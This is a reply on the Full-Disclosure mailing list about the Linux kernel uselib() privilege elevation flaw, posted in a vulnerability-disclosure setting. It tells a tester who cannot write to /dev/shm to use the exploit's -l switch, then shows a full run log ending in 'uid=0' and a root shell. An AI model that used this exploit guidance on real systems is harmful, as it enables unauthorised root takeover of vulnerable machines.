Re: Linux kernel uselib() privilege elevation, corrected

[Karol Wiesek <appelast () drumnbass art pl>]

On Sat, Jan 08, 2005 at 11:38:34AM +0100, Frank Dietrich wrote:
=> Hi there,
=> 
=> Paul Starzetz <ihaquer () isec pl> wrote:
=> > Synopsis:  Linux kernel uselib() privilege elevation
=> > Product:   Linux kernel
=> > Version:   2.4 up to and including 2.4.29-rc2, 2.6 up to and
=> 
=> Is the system allways compromisable whitout tmpfs support in the
=> kernel?
=> 
=> I tried your exploit sample to test my systems. As normal user I get
=> can't write to /dev/shm. /dev/shm here only writeable for root.
=> 

Use -l switch to specify location of lib.

[appelast@nesquik appelast]$ ./ex -l ./lib

[+] SLAB cleanup
    child 1 VMAs 65527
    child 2 VMAs 65527
    child 3 VMAs 33067
[+] moved stack bfffe000, task_size=0xc0000000, map_base=0xbf800000
[+] vmalloc area 0xc7c00000 - 0xcf75c000
    Wait... -
[+] race won maps=10888
    expanded VMA (0xbfffc000-0xffffe000)
[!] try to exploit 0xc8a66000
[+] gate modified ( 0xffec90fc 0x0804ec00 )
[+] exploited, uid=0

sh-2.05b# 

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html